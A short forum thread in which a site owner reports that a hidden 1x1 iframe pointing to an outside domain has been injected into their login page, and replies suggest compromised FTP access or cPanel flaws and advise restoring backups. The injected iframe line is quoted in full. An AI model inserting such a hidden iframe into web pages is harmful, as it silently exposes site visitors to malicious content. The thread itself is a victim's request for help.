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The e-commerce.

Security problem!


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Do you know about this http://banep.info ?

Now I see this code in login.php file

<iframe src='http://banep.info/iframe.php' width='1' height='1' style='visibility: hidden;'></iframe>

My index.php file doesn't work now. Code is broken.


Does anybody hear of this problem? How can I protect my site?

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Sounds like someone gained FTP access to your site and modified the files. Change your passwords and restore a backup (err, you do have a backup right?)


Yes, I found backup. But I see this problem on some sites of my friends. I see the same problem

on other site too (this code in page)...

Maybe it's a cPanel bug? And now some script can gets FTP data.... Or maybe it's a virus on local computer?

Or maybe script work without FTP?


Any ideas?

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Yes, I found backup. But I see this problem on some sites of my friends. I see the same problem

on other site too (this code in page)...

Maybe it's a cPanel bug? And now some script can gets FTP data.... Or maybe it's a virus on local computer?

Or maybe script work without FTP?


Any ideas?

there are cpanel exploits where your host should take care of. Have you notified them?

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